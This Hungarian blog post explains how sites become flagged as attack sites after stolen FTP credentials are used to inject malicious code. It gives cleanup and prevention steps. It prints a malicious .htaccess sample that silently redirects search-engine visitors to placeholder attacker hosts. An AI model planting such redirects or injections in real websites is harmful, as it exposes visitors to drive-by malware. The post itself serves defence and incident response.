Rendszergazda & webfejlesztő devblog Laczkó Zoltán blogja

16Már/100

Bejelentett támadó webhely avagy ftp-vírus

Nem új keletű a dolog, de sajnos még most is elég gyakran kérnek tőlem segítséget, hogy vírusos a weblapjuk, mit tegyenek. Ez a jelenség az, amikor a weblap megnyitása előtt bejön egy oldal, miszerint "Bejelentett támadó webhely" a weboldal és csak saját felelősségünkre tudunk eljutni az oldalra.

Bejelentett támadó webhely

Egy ilyen figyelmeztető oldalt látunk, amikor meg akarjuk nyitni az oldalt a böngészőnkben.

Mi is a vírusos?

Elsőnek is tisztázzunk egy nagy félreértést, ugyanis ilyenkor nem a honlapot futtató szerver fertőződik meg, hanem a weblap tárhelyén lévő fájlokat módosítják, kiegészítve kártékony kódokkal.

A tárhelyen lényegében nincs semmilyen vírus, azon többnyire csak szöveges (html/php/css/js) fájlok, illetve média fájlok (jpg/gif/swf) vannak. Viszont ha ezeket a szöveges fájlokat úgy módosítjuk, hogy amikor egy látogató a weblapot megnyitja, akkor a böngészőjét átirányítják olyan preparált oldalakra, amik megpróbálják különféle vírusokkal, trójai programokkal megfertőzni a számítógépet.

Hogy fértek hozzá a tárhelyhez?

Az összes eddigi, általam ismert esetben nem a szolgáltató szerverének feltörésével jutottak a tárhely FTP hozzáféréséhez, hanem egy olyan felhasználó gépről került ki, akinek volt hozzáférése. Ez többnyire a weboldal tulajdonosa, vagy esetleg az általa megbízott szakember gépe. Tipikusan a számítógépen lévő FTP kliens programok elmentett beállításait, illetve mivel az FTP kommunikáció titkosítatlan csatornán folyik, ezért forgalom naplózással szerzik meg a hozzáféréseket, amit azután egy ismeretlen (többnyire orosz, török, kínai) szerverre továbbít kódolatlan formában.

A hozzáférés továbbítása után akár pár órával is, egy másik, szintén ismeretlen szerverről belépnek a tárhelyre, és módosítják az index.*, default.*, auth.* és további fájlokat, illetve az utóbbi időkben pedig már a *.js fájlokat is. A fájlokba a <body> része után közvetlenül, vagy a </body> rész elé, vagy a </html> után szúrják be. A módosítások kódolt JavaScript, vagy egyéb HTML kódok, mint pl 0px -es iframe, pdf, vagy flash beágyazása.

Egy újabb módszerrel is találkozni, amikor nem az előbb említett módon irányítják az embereket a fertőzött oldalakra, hanem a tárhelyen a .htaccess szolgáltatást használják ki, amellyel bekapcsolják a mod_rewrite -ot. Ilyenkor trükkösen csak a keresőkből érkező látogatókat irányítják át. Így történhet meg, hogy a weboldal tulajdonosának hiába jelzik többen is, hogy vírusos az oldala, amikor megnyitja a weboldalt, nem tapasztal semmi arra utalót.

Példák a módosításokra

Természetesen ezek a példák csak részletei a valós módosításoknak, egyik példa sem működőképes ilyen formában.

html/php módosítások

Támadó webhely html módosítás példa

Támadó webhely html módosítás példa

.htaccess módosítások

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://xyz.info/go.php [R=301,L]
ErrorDocument 401 http://xyz.ru/
ErrorDocument 403 http://xyz.ru/
ErrorDocument 404 http://xyz.ru/
ErrorDocument 500 http://xyz.ru/
Redirect / http://xyz.ru/?

Mi a teendő, ha már megtörtént a baj

Mivel a hozzáférésünk kikerült, ezért időről időre újra és újra megpróbálnak hozzáférni a tárhelyhez, ezért ajánlott a lentiek sorrendjét is betartani.

  • Derítsük ki, hogy mely gépről került ki a jelszó, és szüntessük meg rajta a fertőzést.
  • Változtassuk meg az FTP hozzáférést.
  • Távolítsuk el a kártékony részeket. Érdemes szakember segítségét kérni, aki forrás szinten átnézi a teljes weboldalt.
  • Olvassuk el a Google Sugóját, StopBadware oldalakat.
  • Google Webmaster Tools -ban kérvényezzük a weboldalunk felülvizsgálatát.
  • Ha phishing áldozata lettél, akkor itt is kérj egy felülvizsgálatot.
  • Legyünk türelmesek. A felülvizsgálatok néha pár napot is igénybe vesznek. Ha nem találnak olyan részeket, amelyekről nem lettet eltávolítva a módosítások, akkor szinte azonnal kikerül a weboldal a rendszerből.

Megelőzés

  • Használjunk naprakész víruskeresőt, tűzfal programot.
  • A hozzáféréseinket lehetőleg ne tároljuk el FTP kliens programokban. A TotalCommander az egyik legelterjedtebb program, így a vírusoknak is ez az elsődleges célpontjuk.
  • Ha lehetőség van rá, akkor használjunk titkosított protokollt (SSH, SFTP).
  • A jelszavunk kellően bonyolult és máshol nem használt legyen.
  • Helyezzünk el egy megfelelő .ftpaccess fájlt a tárhelyen.
  • Rendszeresen készítsünk biztonsági mentést
  • Hozzuk létre az abuse@ és webmaster@ kezdetű emaileket. Ide érkezik értesítés az esetleges bejelentésről.